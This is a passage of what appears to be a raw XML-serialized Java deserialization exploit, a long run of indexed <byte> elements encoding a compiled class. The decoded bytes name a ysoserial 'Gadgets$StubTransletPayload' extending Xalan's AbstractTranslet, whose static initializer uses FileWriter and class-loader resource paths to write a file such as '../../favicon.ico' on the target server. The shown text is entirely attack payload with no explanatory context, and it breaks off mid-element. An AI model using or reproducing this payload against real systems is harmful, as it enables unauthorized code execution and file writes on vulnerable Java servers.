index=\"1213\"><byte>114</byte></void><void index=\"1214\"><byte>99</byte></void><void index=\"1215\"><byte>101</byte></void><void index=\"1216\"><byte>70</byte></void><void index=\"1217\"><byte>105</byte></void><void index=\"1218\"><byte>108</byte></void><void index=\"1219\"><byte>101</byte></void><void index=\"1220\"><byte>1</byte></void><void index=\"1221\"><byte>0</byte></void><void index=\"1222\"><byte>12</byte></void><void index=\"1223\"><byte>71</byte></void><void index=\"1224\"><byte>97</byte></void><void index=\"1225\"><byte>100</byte></void><void index=\"1226\"><byte>103</byte></void><void index=\"1227\"><byte>101</byte></void><void index=\"1228\"><byte>116</byte></void><void index=\"1229\"><byte>115</byte></void><void index=\"1230\"><byte>46</byte></void><void index=\"1231\"><byte>106</byte></void><void index=\"1232\"><byte>97</byte></void><void index=\"1233\"><byte>118</byte></void><void index=\"1234\"><byte>97</byte></void><void index=\"1235\"><byte>12</byte></void><void index=\"1236\"><byte>0</byte></void><void index=\"1237\"><byte>10</byte></void><void index=\"1238\"><byte>0</byte></void><void index=\"1239\"><byte>11</byte></void><void index=\"1240\"><byte>7</byte></void><void index=\"1241\"><byte>0</byte></void><void index=\"1242\"><byte>40</byte></void><void index=\"1243\"><byte>1</byte></void><void index=\"1244\"><byte>0</byte></void><void index=\"1245\"><byte>51</byte></void><void index=\"1246\"><byte>121</byte></void><void index=\"1247\"><byte>115</byte></void><void index=\"1248\"><byte>111</byte></void><void index=\"1249\"><byte>115</byte></void><void index=\"1250\"><byte>101</byte></void><void index=\"1251\"><byte>114</byte></void><void index=\"1252\"><byte>105</byte></void><void index=\"1253\"><byte>97</byte></void><void index=\"1254\"><byte>108</byte></void><void index=\"1255\"><byte>47</byte></void><void index=\"1256\"><byte>112</byte></void><void index=\"1257\"><byte>97</byte></void><void index=\"1258\"><byte>121</byte></void><void index=\"1259\"><byte>108</byte></void><void index=\"1260\"><byte>111</byte></void><void index=\"1261\"><byte>97</byte></void><void index=\"1262\"><byte>100</byte></void><void index=\"1263\"><byte>115</byte></void><void index=\"1264\"><byte>47</byte></void><void index=\"1265\"><byte>117</byte></void><void index=\"1266\"><byte>116</byte></void><void index=\"1267\"><byte>105</byte></void><void index=\"1268\"><byte>108</byte></void><void index=\"1269\"><byte>47</byte></void><void index=\"1270\"><byte>71</byte></void><void index=\"1271\"><byte>97</byte></void><void index=\"1272\"><byte>100</byte></void><void index=\"1273\"><byte>103</byte></void><void index=\"1274\"><byte>101</byte></void><void index=\"1275\"><byte>116</byte></void><void index=\"1276\"><byte>115</byte></void><void index=\"1277\"><byte>36</byte></void><void index=\"1278\"><byte>83</byte></void><void index=\"1279\"><byte>116</byte></void><void index=\"1280\"><byte>117</byte></void><void index=\"1281\"><byte>98</byte></void><void index=\"1282\"><byte>84</byte></void><void index=\"1283\"><byte>114</byte></void><void index=\"1284\"><byte>97</byte></void><void index=\"1285\"><byte>110</byte></void><void index=\"1286\"><byte>115</byte></void><void index=\"1287\"><byte>108</byte></void><void index=\"1288\"><byte>101</byte></void><void index=\"1289\"><byte>116</byte></void><void index=\"1290\"><byte>80</byte></void><void index=\"1291\"><byte>97</byte></void><void index=\"1292\"><byte>121</byte></void><void index=\"1293\"><byte>108</byte></void><void index=\"1294\"><byte>111</byte></void><void index=\"1295\"><byte>97</byte></void><void index=\"1296\"><byte>100</byte></void><void index=\"1297\"><byte>1</byte></void><void index=\"1298\"><byte>0</byte></void><void index=\"1299\"><byte>64</byte></void><void index=\"1300\"><byte>99</byte></void><void index=\"1301\"><byte>111</byte></void><void index=\"1302\"><byte>109</byte></void><void index=\"1303\"><byte>47</byte></void><void index=\"1304\"><byte>115</byte></void><void index=\"1305\"><byte>117</byte></void><void index=\"1306\"><byte>110</byte></void><void index=\"1307\"><byte>47</byte></void><void index=\"1308\"><byte>111</byte></void><void index=\"1309\"><byte>114</byte></void><void index=\"1310\"><byte>103</byte></void><void index=\"1311\"><byte>47</byte></void><void index=\"1312\"><byte>97</byte></void><void index=\"1313\"><byte>112</byte></void><void index=\"1314\"><byte>97</byte></void><void index=\"1315\"><byte>99</byte></void><void index=\"1316\"><byte>104</byte></void><void index=\"1317\"><byte>101</byte></void><void index=\"1318\"><byte>47</byte></void><void index=\"1319\"><byte>120</byte></void><void index=\"1320\"><byte>97</byte></void><void index=\"1321\"><byte>108</byte></void><void index=\"1322\"><byte>97</byte></void><void index=\"1323\"><byte>110</byte></void><void index=\"1324\"><byte>47</byte></void><void index=\"1325\"><byte>105</byte></void><void index=\"1326\"><byte>110</byte></void><void index=\"1327\"><byte>116</byte></void><void index=\"1328\"><byte>101</byte></void><void index=\"1329\"><byte>114</byte></void><void index=\"1330\"><byte>110</byte></void><void index=\"1331\"><byte>97</byte></void><void index=\"1332\"><byte>108</byte></void><void index=\"1333\"><byte>47</byte></void><void index=\"1334\"><byte>120</byte></void><void index=\"1335\"><byte>115</byte></void><void index=\"1336\"><byte>108</byte></void><void index=\"1337\"><byte>116</byte></void><void index=\"1338\"><byte>99</byte></void><void index=\"1339\"><byte>47</byte></void><void index=\"1340\"><byte>114</byte></void><void index=\"1341\"><byte>117</byte></void><void index=\"1342\"><byte>110</byte></void><void index=\"1343\"><byte>116</byte></void><void index=\"1344\"><byte>105</byte></void><void index=\"1345\"><byte>109</byte></void><void index=\"1346\"><byte>101</byte></void><void index=\"1347\"><byte>47</byte></void><void index=\"1348\"><byte>65</byte></void><void index=\"1349\"><byte>98</byte></void><void index=\"1350\"><byte>115</byte></void><void index=\"1351\"><byte>116</byte></void><void index=\"1352\"><byte>114</byte></void><void index=\"1353\"><byte>97</byte></void><void index=\"1354\"><byte>99</byte></void><void index=\"1355\"><byte>116</byte></void><void index=\"1356\"><byte>84</byte></void><void index=\"1357\"><byte>114</byte></void><void index=\"1358\"><byte>97</byte></void><void index=\"1359\"><byte>110</byte></void><void index=\"1360\"><byte>115</byte></void><void index=\"1361\"><byte>108</byte></void><void index=\"1362\"><byte>101</byte></void><void index=\"1363\"><byte>116</byte></void><void index=\"1364\"><byte>1</byte></void><void index=\"1365\"><byte>0</byte></void><void index=\"1366\"><byte>20</byte></void><void index=\"1367\"><byte>106</byte></void><void index=\"1368\"><byte>97</byte></void><void index=\"1369\"><byte>118</byte></void><void index=\"1370\"><byte>97</byte></void><void index=\"1371\"><byte>47</byte></void><void index=\"1372\"><byte>105</byte></void><void index=\"1373\"><byte>111</byte></void><void index=\"1374\"><byte>47</byte></void><void index=\"1375\"><byte>83</byte></void><void index=\"1376\"><byte>101</byte></void><void index=\"1377\"><byte>114</byte></void><void index=\"1378\"><byte>105</byte></void><void index=\"1379\"><byte>97</byte></void><void index=\"1380\"><byte>108</byte></void><void index=\"1381\"><byte>105</byte></void><void index=\"1382\"><byte>122</byte></void><void index=\"1383\"><byte>97</byte></void><void index=\"1384\"><byte>98</byte></void><void index=\"1385\"><byte>108</byte></void><void index=\"1386\"><byte>101</byte></void><void index=\"1387\"><byte>1</byte></void><void index=\"1388\"><byte>0</byte></void><void index=\"1389\"><byte>57</byte></void><void index=\"1390\"><byte>99</byte></void><void index=\"1391\"><byte>111</byte></void><void index=\"1392\"><byte>109</byte></void><void index=\"1393\"><byte>47</byte></void><void index=\"1394\"><byte>115</byte></void><void index=\"1395\"><byte>117</byte></void><void index=\"1396\"><byte>110</byte></void><void index=\"1397\"><byte>47</byte></void><void index=\"1398\"><byte>111</byte></void><void index=\"1399\"><byte>114</byte></void><void index=\"1400\"><byte>103</byte></void><void index=\"1401\"><byte>47</byte></void><void index=\"1402\"><byte>97</byte></void><void index=\"1403\"><byte>112</byte></void><void index=\"1404\"><byte>97</byte></void><void index=\"1405\"><byte>99</byte></void><void index=\"1406\"><byte>104</byte></void><void index=\"1407\"><byte>101</byte></void><void index=\"1408\"><byte>47</byte></void><void index=\"1409\"><byte>120</byte></void><void index=\"1410\"><byte>97</byte></void><void index=\"1411\"><byte>108</byte></void><void index=\"1412\"><byte>97</byte></void><void index=\"1413\"><byte>110</byte></void><void index=\"1414\"><byte>47</byte></void><void index=\"1415\"><byte>105</byte></void><void index=\"1416\"><byte>110</byte></void><void index=\"1417\"><byte>116</byte></void><void index=\"1418\"><byte>101</byte></void><void index=\"1419\"><byte>114</byte></void><void index=\"1420\"><byte>110</byte></void><void index=\"1421\"><byte>97</byte></void><void index=\"1422\"><byte>108</byte></void><void index=\"1423\"><byte>47</byte></void><void index=\"1424\"><byte>120</byte></void><void index=\"1425\"><byte>115</byte></void><void index=\"1426\"><byte>108</byte></void><void index=\"1427\"><byte>116</byte></void><void index=\"1428\"><byte>99</byte></void><void index=\"1429\"><byte>47</byte></void><void index=\"1430\"><byte>84</byte></void><void index=\"1431\"><byte>114</byte></void><void index=\"1432\"><byte>97</byte></void><void index=\"1433\"><byte>110</byte></void><void index=\"1434\"><byte>115</byte></void><void index=\"1435\"><byte>108</byte></void><void index=\"1436\"><byte>101</byte></void><void index=\"1437\"><byte>116</byte></void><void index=\"1438\"><byte>69</byte></void><void index=\"1439\"><byte>120</byte></void><void index=\"1440\"><byte>99</byte></void><void index=\"1441\"><byte>101</byte></void><void index=\"1442\"><byte>112</byte></void><void index=\"1443\"><byte>116</byte></void><void index=\"1444\"><byte>105</byte></void><void index=\"1445\"><byte>111</byte></void><void index=\"1446\"><byte>110</byte></void><void index=\"1447\"><byte>1</byte></void><void index=\"1448\"><byte>0</byte></void><void index=\"1449\"><byte>31</byte></void><void index=\"1450\"><byte>121</byte></void><void index=\"1451\"><byte>115</byte></void><void index=\"1452\"><byte>111</byte></void><void index=\"1453\"><byte>115</byte></void><void index=\"1454\"><byte>101</byte></void><void index=\"1455\"><byte>114</byte></void><void index=\"1456\"><byte>105</byte></void><void index=\"1457\"><byte>97</byte></void><void index=\"1458\"><byte>108</byte></void><void index=\"1459\"><byte>47</byte></void><void index=\"1460\"><byte>112</byte></void><void index=\"1461\"><byte>97</byte></void><void index=\"1462\"><byte>121</byte></void><void index=\"1463\"><byte>108</byte></void><void index=\"1464\"><byte>111</byte></void><void index=\"1465\"><byte>97</byte></void><void index=\"1466\"><byte>100</byte></void><void index=\"1467\"><byte>115</byte></void><void index=\"1468\"><byte>47</byte></void><void index=\"1469\"><byte>117</byte></void><void index=\"1470\"><byte>116</byte></void><void index=\"1471\"><byte>105</byte></void><void index=\"1472\"><byte>108</byte></void><void index=\"1473\"><byte>47</byte></void><void index=\"1474\"><byte>71</byte></void><void index=\"1475\"><byte>97</byte></void><void index=\"1476\"><byte>100</byte></void><void index=\"1477\"><byte>103</byte></void><void index=\"1478\"><byte>101</byte></void><void index=\"1479\"><byte>116</byte></void><void index=\"1480\"><byte>115</byte></void><void index=\"1481\"><byte>1</byte></void><void index=\"1482\"><byte>0</byte></void><void index=\"1483\"><byte>8</byte></void><void index=\"1484\"><byte>60</byte></void><void index=\"1485\"><byte>99</byte></void><void index=\"1486\"><byte>108</byte></void><void index=\"1487\"><byte>105</byte></void><void index=\"1488\"><byte>110</byte></void><void index=\"1489\"><byte>105</byte></void><void index=\"1490\"><byte>116</byte></void><void index=\"1491\"><byte>62</byte></void><void index=\"1492\"><byte>1</byte></void><void index=\"1493\"><byte>0</byte></void><void index=\"1494\"><byte>18</byte></void><void index=\"1495\"><byte>106</byte></void><void index=\"1496\"><byte>97</byte></void><void index=\"1497\"><byte>118</byte></void><void index=\"1498\"><byte>97</byte></void><void index=\"1499\"><byte>47</byte></void><void index=\"1500\"><byte>105</byte></void><void index=\"1501\"><byte>111</byte></void><void index=\"1502\"><byte>47</byte></void><void index=\"1503\"><byte>70</byte></void><void index=\"1504\"><byte>105</byte></void><void index=\"1505\"><byte>108</byte></void><void index=\"1506\"><byte>101</byte></void><void index=\"1507\"><byte>87</byte></void><void index=\"1508\"><byte>114</byte></void><void index=\"1509\"><byte>105</byte></void><void index=\"1510\"><byte>116</byte></void><void index=\"1511\"><byte>101</byte></void><void index=\"1512\"><byte>114</byte></void><void index=\"1513\"><byte>7</byte></void><void index=\"1514\"><byte>0</byte></void><void index=\"1515\"><byte>42</byte></void><void index=\"1516\"><byte>1</byte></void><void index=\"1517\"><byte>0</byte></void><void index=\"1518\"><byte>22</byte></void><void index=\"1519\"><byte>106</byte></void><void index=\"1520\"><byte>97</byte></void><void index=\"1521\"><byte>118</byte></void><void index=\"1522\"><byte>97</byte></void><void index=\"1523\"><byte>47</byte></void><void index=\"1524\"><byte>108</byte></void><void index=\"1525\"><byte>97</byte></void><void index=\"1526\"><byte>110</byte></void><void index=\"1527\"><byte>103</byte></void><void index=\"1528\"><byte>47</byte></void><void index=\"1529\"><byte>83</byte></void><void index=\"1530\"><byte>116</byte></void><void index=\"1531\"><byte>114</byte></void><void index=\"1532\"><byte>105</byte></void><void index=\"1533\"><byte>110</byte></void><void index=\"1534\"><byte>103</byte></void><void index=\"1535\"><byte>66</byte></void><void index=\"1536\"><byte>117</byte></void><void index=\"1537\"><byte>102</byte></void><void index=\"1538\"><byte>102</byte></void><void index=\"1539\"><byte>101</byte></void><void index=\"1540\"><byte>114</byte></void><void index=\"1541\"><byte>7</byte></void><void index=\"1542\"><byte>0</byte></void><void index=\"1543\"><byte>44</byte></void><void index=\"1544\"><byte>10</byte></void><void index=\"1545\"><byte>0</byte></void><void index=\"1546\"><byte>45</byte></void><void index=\"1547\"><byte>0</byte></void><void index=\"1548\"><byte>34</byte></void><void index=\"1549\"><byte>1</byte></void><void index=\"1550\"><byte>0</byte></void><void index=\"1551\"><byte>16</byte></void><void index=\"1552\"><byte>106</byte></void><void index=\"1553\"><byte>97</byte></void><void index=\"1554\"><byte>118</byte></void><void index=\"1555\"><byte>97</byte></void><void index=\"1556\"><byte>47</byte></void><void index=\"1557\"><byte>108</byte></void><void index=\"1558\"><byte>97</byte></void><void index=\"1559\"><byte>110</byte></void><void index=\"1560\"><byte>103</byte></void><void index=\"1561\"><byte>47</byte></void><void index=\"1562\"><byte>84</byte></void><void index=\"1563\"><byte>104</byte></void><void index=\"1564\"><byte>114</byte></void><void index=\"1565\"><byte>101</byte></void><void index=\"1566\"><byte>97</byte></void><void index=\"1567\"><byte>100</byte></void><void index=\"1568\"><byte>7</byte></void><void index=\"1569\"><byte>0</byte></void><void index=\"1570\"><byte>47</byte></void><void index=\"1571\"><byte>1</byte></void><void index=\"1572\"><byte>0</byte></void><void index=\"1573\"><byte>13</byte></void><void index=\"1574\"><byte>99</byte></void><void index=\"1575\"><byte>117</byte></void><void index=\"1576\"><byte>114</byte></void><void index=\"1577\"><byte>114</byte></void><void index=\"1578\"><byte>101</byte></void><void index=\"1579\"><byte>110</byte></void><void index=\"1580\"><byte>116</byte></void><void index=\"1581\"><byte>84</byte></void><void index=\"1582\"><byte>104</byte></void><void index=\"1583\"><byte>114</byte></void><void index=\"1584\"><byte>101</byte></void><void index=\"1585\"><byte>97</byte></void><void index=\"1586\"><byte>100</byte></void><void index=\"1587\"><byte>1</byte></void><void index=\"1588\"><byte>0</byte></void><void index=\"1589\"><byte>20</byte></void><void index=\"1590\"><byte>40</byte></void><void index=\"1591\"><byte>41</byte></void><void index=\"1592\"><byte>76</byte></void><void index=\"1593\"><byte>106</byte></void><void index=\"1594\"><byte>97</byte></void><void index=\"1595\"><byte>118</byte></void><void index=\"1596\"><byte>97</byte></void><void index=\"1597\"><byte>47</byte></void><void index=\"1598\"><byte>108</byte></void><void index=\"1599\"><byte>97</byte></void><void index=\"1600\"><byte>110</byte></void><void index=\"1601\"><byte>103</byte></void><void index=\"1602\"><byte>47</byte></void><void index=\"1603\"><byte>84</byte></void><void index=\"1604\"><byte>104</byte></void><void index=\"1605\"><byte>114</byte></void><void index=\"1606\"><byte>101</byte></void><void index=\"1607\"><byte>97</byte></void><void index=\"1608\"><byte>100</byte></void><void index=\"1609\"><byte>59</byte></void><void index=\"1610\"><byte>12</byte></void><void index=\"1611\"><byte>0</byte></void><void index=\"1612\"><byte>49</byte></void><void index=\"1613\"><byte>0</byte></void><void index=\"1614\"><byte>50</byte></void><void index=\"1615\"><byte>10</byte></void><void index=\"1616\"><byte>0</byte></void><void index=\"1617\"><byte>48</byte></void><void index=\"1618\"><byte>0</byte></void><void index=\"1619\"><byte>51</byte></void><void index=\"1620\"><byte>1</byte></void><void index=\"1621\"><byte>0</byte></void><void index=\"1622\"><byte>21</byte></void><void index=\"1623\"><byte>103</byte></void><void index=\"1624\"><byte>101</byte></void><void index=\"1625\"><byte>116</byte></void><void index=\"1626\"><byte>67</byte></void><void index=\"1627\"><byte>111</byte></void><void index=\"1628\"><byte>110</byte></void><void index=\"1629\"><byte>116</byte></void><void index=\"1630\"><byte>101</byte></void><void index=\"1631\"><byte>120</byte></void><void index=\"1632\"><byte>116</byte></void><void index=\"1633\"><byte>67</byte></void><void index=\"1634\"><byte>108</byte></void><void index=\"1635\"><byte>97</byte></void><void index=\"1636\"><byte>115</byte></void><void index=\"1637\"><byte>115</byte></void><void index=\"1638\"><byte>76</byte></void><void index=\"1639\"><byte>111</byte></void><void index=\"1640\"><byte>97</byte></void><void index=\"1641\"><byte>100</byte></void><void index=\"1642\"><byte>101</byte></void><void index=\"1643\"><byte>114</byte></void><void index=\"1644\"><byte>1</byte></void><void index=\"1645\"><byte>0</byte></void><void index=\"1646\"><byte>25</byte></void><void index=\"1647\"><byte>40</byte></void><void index=\"1648\"><byte>41</byte></void><void index=\"1649\"><byte>76</byte></void><void index=\"1650\"><byte>106</byte></void><void index=\"1651\"><byte>97</byte></void><void index=\"1652\"><byte>118</byte></void><void index=\"1653\"><byte>97</byte></void><void index=\"1654\"><byte>47</byte></void><void index=\"1655\"><byte>108</byte></void><void index=\"1656\"><byte>97</byte></void><void index=\"1657\"><byte>110</byte></void><void index=\"1658\"><byte>103</byte></void><void index=\"1659\"><byte>47</byte></void><void index=\"1660\"><byte>67</byte></void><void index=\"1661\"><byte>108</byte></void><void index=\"1662\"><byte>97</byte></void><void index=\"1663\"><byte>115</byte></void><void index=\"1664\"><byte>115</byte></void><void index=\"1665\"><byte>76</byte></void><void index=\"1666\"><byte>111</byte></void><void index=\"1667\"><byte>97</byte></void><void index=\"1668\"><byte>100</byte></void><void index=\"1669\"><byte>101</byte></void><void index=\"1670\"><byte>114</byte></void><void index=\"1671\"><byte>59</byte></void><void index=\"1672\"><byte>12</byte></void><void index=\"1673\"><byte>0</byte></void><void index=\"1674\"><byte>53</byte></void><void index=\"1675\"><byte>0</byte></void><void index=\"1676\"><byte>54</byte></void><void index=\"1677\"><byte>10</byte></void><void index=\"1678\"><byte>0</byte></void><void index=\"1679\"><byte>48</byte></void><void index=\"1680\"><byte>0</byte></void><void index=\"1681\"><byte>55</byte></void><void index=\"1682\"><byte>1</byte></void><void index=\"1683\"><byte>0</byte></void><void index=\"1684\"><byte>1</byte></void><void index=\"1685\"><byte>47</byte></void><void index=\"1686\"><byte>8</byte></void><void index=\"1687\"><byte>0</byte></void><void index=\"1688\"><byte>57</byte></void><void index=\"1689\"><byte>1</byte></void><void index=\"1690\"><byte>0</byte></void><void index=\"1691\"><byte>21</byte></void><void index=\"1692\"><byte>106</byte></void><void index=\"1693\"><byte>97</byte></void><void index=\"1694\"><byte>118</byte></void><void index=\"1695\"><byte>97</byte></void><void index=\"1696\"><byte>47</byte></void><void index=\"1697\"><byte>108</byte></void><void index=\"1698\"><byte>97</byte></void><void index=\"1699\"><byte>110</byte></void><void index=\"1700\"><byte>103</byte></void><void index=\"1701\"><byte>47</byte></void><void index=\"1702\"><byte>67</byte></void><void index=\"1703\"><byte>108</byte></void><void index=\"1704\"><byte>97</byte></void><void index=\"1705\"><byte>115</byte></void><void index=\"1706\"><byte>115</byte></void><void index=\"1707\"><byte>76</byte></void><void index=\"1708\"><byte>111</byte></void><void index=\"1709\"><byte>97</byte></void><void index=\"1710\"><byte>100</byte></void><void index=\"1711\"><byte>101</byte></void><void index=\"1712\"><byte>114</byte></void><void index=\"1713\"><byte>7</byte></void><void index=\"1714\"><byte>0</byte></void><void index=\"1715\"><byte>59</byte></void><void index=\"1716\"><byte>1</byte></void><void index=\"1717\"><byte>0</byte></void><void index=\"1718\"><byte>11</byte></void><void index=\"1719\"><byte>103</byte></void><void index=\"1720\"><byte>101</byte></void><void index=\"1721\"><byte>116</byte></void><void index=\"1722\"><byte>82</byte></void><void index=\"1723\"><byte>101</byte></void><void index=\"1724\"><byte>115</byte></void><void index=\"1725\"><byte>111</byte></void><void index=\"1726\"><byte>117</byte></void><void index=\"1727\"><byte>114</byte></void><void index=\"1728\"><byte>99</byte></void><void index=\"1729\"><byte>101</byte></void><void index=\"1730\"><byte>1</byte></void><void index=\"1731\"><byte>0</byte></void><void index=\"1732\"><byte>34</byte></void><void index=\"1733\"><byte>40</byte></void><void index=\"1734\"><byte>76</byte></void><void index=\"1735\"><byte>106</byte></void><void index=\"1736\"><byte>97</byte></void><void index=\"1737\"><byte>118</byte></void><void index=\"1738\"><byte>97</byte></void><void index=\"1739\"><byte>47</byte></void><void index=\"1740\"><byte>108</byte></void><void index=\"1741\"><byte>97</byte></void><void index=\"1742\"><byte>110</byte></void><void index=\"1743\"><byte>103</byte></void><void index=\"1744\"><byte>47</byte></void><void index=\"1745\"><byte>83</byte></void><void index=\"1746\"><byte>116</byte></void><void index=\"1747\"><byte>114</byte></void><void index=\"1748\"><byte>105</byte></void><void index=\"1749\"><byte>110</byte></void><void index=\"1750\"><byte>103</byte></void><void index=\"1751\"><byte>59</byte></void><void index=\"1752\"><byte>41</byte></void><void index=\"1753\"><byte>76</byte></void><void index=\"1754\"><byte>106</byte></void><void index=\"1755\"><byte>97</byte></void><void index=\"1756\"><byte>118</byte></void><void index=\"1757\"><byte>97</byte></void><void index=\"1758\"><byte>47</byte></void><void index=\"1759\"><byte>110</byte></void><void index=\"1760\"><byte>101</byte></void><void index=\"1761\"><byte>116</byte></void><void index=\"1762\"><byte>47</byte></void><void index=\"1763\"><byte>85</byte></void><void index=\"1764\"><byte>82</byte></void><void index=\"1765\"><byte>76</byte></void><void index=\"1766\"><byte>59</byte></void><void index=\"1767\"><byte>12</byte></void><void index=\"1768\"><byte>0</byte></void><void index=\"1769\"><byte>61</byte></void><void index=\"1770\"><byte>0</byte></void><void index=\"1771\"><byte>62</byte></void><void index=\"1772\"><byte>10</byte></void><void index=\"1773\"><byte>0</byte></void><void index=\"1774\"><byte>60</byte></void><void index=\"1775\"><byte>0</byte></void><void index=\"1776\"><byte>63</byte></void><void index=\"1777\"><byte>1</byte></void><void index=\"1778\"><byte>0</byte></void><void index=\"1779\"><byte>12</byte></void><void index=\"1780\"><byte>106</byte></void><void index=\"1781\"><byte>97</byte></void><void index=\"1782\"><byte>118</byte></void><void index=\"1783\"><byte>97</byte></void><void index=\"1784\"><byte>47</byte></void><void index=\"1785\"><byte>110</byte></void><void index=\"1786\"><byte>101</byte></void><void index=\"1787\"><byte>116</byte></void><void index=\"1788\"><byte>47</byte></void><void index=\"1789\"><byte>85</byte></void><void index=\"1790\"><byte>82</byte></void><void index=\"1791\"><byte>76</byte></void><void index=\"1792\"><byte>7</byte></void><void index=\"1793\"><byte>0</byte></void><void index=\"1794\"><byte>65</byte></void><void index=\"1795\"><byte>1</byte></void><void index=\"1796\"><byte>0</byte></void><void index=\"1797\"><byte>7</byte></void><void index=\"1798\"><byte>103</byte></void><void index=\"1799\"><byte>101</byte></void><void index=\"1800\"><byte>116</byte></void><void index=\"1801\"><byte>80</byte></void><void index=\"1802\"><byte>97</byte></void><void index=\"1803\"><byte>116</byte></void><void index=\"1804\"><byte>104</byte></void><void index=\"1805\"><byte>1</byte></void><void index=\"1806\"><byte>0</byte></void><void index=\"1807\"><byte>20</byte></void><void index=\"1808\"><byte>40</byte></void><void index=\"1809\"><byte>41</byte></void><void index=\"1810\"><byte>76</byte></void><void index=\"1811\"><byte>106</byte></void><void index=\"1812\"><byte>97</byte></void><void index=\"1813\"><byte>118</byte></void><void index=\"1814\"><byte>97</byte></void><void index=\"1815\"><byte>47</byte></void><void index=\"1816\"><byte>108</byte></void><void index=\"1817\"><byte>97</byte></void><void index=\"1818\"><byte>110</byte></void><void index=\"1819\"><byte>103</byte></void><void index=\"1820\"><byte>47</byte></void><void index=\"1821\"><byte>83</byte></void><void index=\"1822\"><byte>116</byte></void><void index=\"1823\"><byte>114</byte></void><void index=\"1824\"><byte>105</byte></void><void index=\"1825\"><byte>110</byte></void><void index=\"1826\"><byte>103</byte></void><void index=\"1827\"><byte>59</byte></void><void index=\"1828\"><byte>12</byte></void><void index=\"1829\"><byte>0</byte></void><void index=\"1830\"><byte>67</byte></void><void index=\"1831\"><byte>0</byte></void><void index=\"1832\"><byte>68</byte></void><void index=\"1833\"><byte>10</byte></void><void index=\"1834\"><byte>0</byte></void><void index=\"1835\"><byte>66</byte></void><void index=\"1836\"><byte>0</byte></void><void index=\"1837\"><byte>69</byte></void><void index=\"1838\"><byte>1</byte></void><void index=\"1839\"><byte>0</byte></void><void index=\"1840\"><byte>6</byte></void><void index=\"1841\"><byte>97</byte></void><void index=\"1842\"><byte>112</byte></void><void index=\"1843\"><byte>112</byte></void><void index=\"1844\"><byte>101</byte></void><void index=\"1845\"><byte>110</byte></void><void index=\"1846\"><byte>100</byte></void><void index=\"1847\"><byte>1</byte></void><void index=\"1848\"><byte>0</byte></void><void index=\"1849\"><byte>44</byte></void><void index=\"1850\"><byte>40</byte></void><void index=\"1851\"><byte>76</byte></void><void index=\"1852\"><byte>106</byte></void><void index=\"1853\"><byte>97</byte></void><void index=\"1854\"><byte>118</byte></void><void index=\"1855\"><byte>97</byte></void><void index=\"1856\"><byte>47</byte></void><void index=\"1857\"><byte>108</byte></void><void index=\"1858\"><byte>97</byte></void><void index=\"1859\"><byte>110</byte></void><void index=\"1860\"><byte>103</byte></void><void index=\"1861\"><byte>47</byte></void><void index=\"1862\"><byte>83</byte></void><void index=\"1863\"><byte>116</byte></void><void index=\"1864\"><byte>114</byte></void><void index=\"1865\"><byte>105</byte></void><void index=\"1866\"><byte>110</byte></void><void index=\"1867\"><byte>103</byte></void><void index=\"1868\"><byte>59</byte></void><void index=\"1869\"><byte>41</byte></void><void index=\"1870\"><byte>76</byte></void><void index=\"1871\"><byte>106</byte></void><void index=\"1872\"><byte>97</byte></void><void index=\"1873\"><byte>118</byte></void><void index=\"1874\"><byte>97</byte></void><void index=\"1875\"><byte>47</byte></void><void index=\"1876\"><byte>108</byte></void><void index=\"1877\"><byte>97</byte></void><void index=\"1878\"><byte>110</byte></void><void index=\"1879\"><byte>103</byte></void><void index=\"1880\"><byte>47</byte></void><void index=\"1881\"><byte>83</byte></void><void index=\"1882\"><byte>116</byte></void><void index=\"1883\"><byte>114</byte></void><void index=\"1884\"><byte>105</byte></void><void index=\"1885\"><byte>110</byte></void><void index=\"1886\"><byte>103</byte></void><void index=\"1887\"><byte>66</byte></void><void index=\"1888\"><byte>117</byte></void><void index=\"1889\"><byte>102</byte></void><void index=\"1890\"><byte>102</byte></void><void index=\"1891\"><byte>101</byte></void><void index=\"1892\"><byte>114</byte></void><void index=\"1893\"><byte>59</byte></void><void index=\"1894\"><byte>12</byte></void><void index=\"1895\"><byte>0</byte></void><void index=\"1896\"><byte>71</byte></void><void index=\"1897\"><byte>0</byte></void><void index=\"1898\"><byte>72</byte></void><void index=\"1899\"><byte>10</byte></void><void index=\"1900\"><byte>0</byte></void><void index=\"1901\"><byte>45</byte></void><void index=\"1902\"><byte>0</byte></void><void index=\"1903\"><byte>73</byte></void><void index=\"1904\"><byte>1</byte></void><void index=\"1905\"><byte>0</byte></void><void index=\"1906\"><byte>17</byte></void><void index=\"1907\"><byte>46</byte></void><void index=\"1908\"><byte>46</byte></void><void index=\"1909\"><byte>47</byte></void><void index=\"1910\"><byte>46</byte></void><void index=\"1911\"><byte>46</byte></void><void index=\"1912\"><byte>47</byte></void><void index=\"1913\"><byte>102</byte></void><void index=\"1914\"><byte>97</byte></void><void index=\"1915\"><byte>118</byte></void><void index=\"1916\"><byte>105</byte></void><void index=\"1917\"><byte>99</byte></void><void index=\"1918\"><byte>111</byte></void><void index=\"1919\"><byte>110</byte></void><void index=\"1920\"><byte>46</byte></void><void index=\"1921\"><byte>105</byte></void><void index=\"1922\"><byte>99</byte></void><void index=\"1923\"><byte>111</byte></void><void index=\"1924\"><byte>8</byte></void><void index=\"1925\"><byte>0</byte></void><void index=\"1926\"><byte>75</byte></void><void index=\"1927\"><byte>1</byte></void><void index=\"1928\"><byte>0</byte></void><void index=\"1929\"><byte>8</byte></void><void index=\"1930\"><byte>116</byte></void><void index=\"1931\"><byte>111</byte></void><void index=\"1932\"><byte>83</byte></void><void index=\"1933\"><byte>116</byte></void><void index=\"1934\"><byte>114</byte></void><void index=\"1935\"><byte>105</byte></void><void index=\"1936\"><byte>110</byte></void><void index=\"1937\"><byte>103</byte></void><void index=\"1938\"><byte>12</byte></void><void index=\"1939\"><byte>0</byte></void><void index=\"1940\"><byte>77</byte></void><void index=\"1941\"><byte>0</byte></void><void index=\"1942\"><byte>68</byte></void><void index=\"1943\"><byte>10</byte></void><void index=\"1944\"><byte>0</byte></void><void index=\"1945\"><byte>45</byte></void><void index=\"1946\"><byte>0</byte></void><void index=\"1947\"><byte>78</byte></void><void index=\"1948\"><byte>1</byte></void><void index=\"1949\"><byte>0</byte></void><void index=\"1950\"><byte>21</byte></void><void index=\"1951\"><byte>40</byte></void><void index=\"1952\"><byte>76</byte></void><void index=\"1953\"><byte>106</byte></void><void index=\"1954\"><byte>97</byte></void><void index=\"1955\"><byte>118</byte></void><void index=\"1956\"><byte>97</byte></void><void index=\"1957\"><byte>47</byte></void><void index=\"1958\"><byte>108</byte></void><void index=\"1959\"><byte>97</byte></void><void index=\"1960\"><byte>110</byte></void><void index=\"1961\"><byte>103</byte></void><void 